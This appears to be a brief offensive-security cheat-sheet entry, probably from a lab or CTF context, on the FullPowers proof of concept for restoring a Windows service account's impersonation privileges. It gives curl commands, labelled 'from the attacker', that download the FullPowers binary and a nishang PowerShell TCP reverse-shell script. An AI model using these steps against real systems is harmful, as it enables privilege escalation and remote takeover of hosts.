It is basically a PoC made for automatically recovering the default privileges set of a service account including seImpersonate and seAssignPrimaryToken privileges
Setup
Downloading the binary
From the attacker ⚔️
curl --silent --location --request GET --remote-name 'https://github.com/itm4n/FullPowers/releases/download/v0.1/FullPowers.exe'
Downloading a TCP Reverse Shell
From the attacker ⚔️
curl --silent --location --request GET 'https://github.com/samratashok/nishang/raw/refs/heads/master/Shells/Invoke-PowerShellTcpOneLine.ps1' --output rev.ps1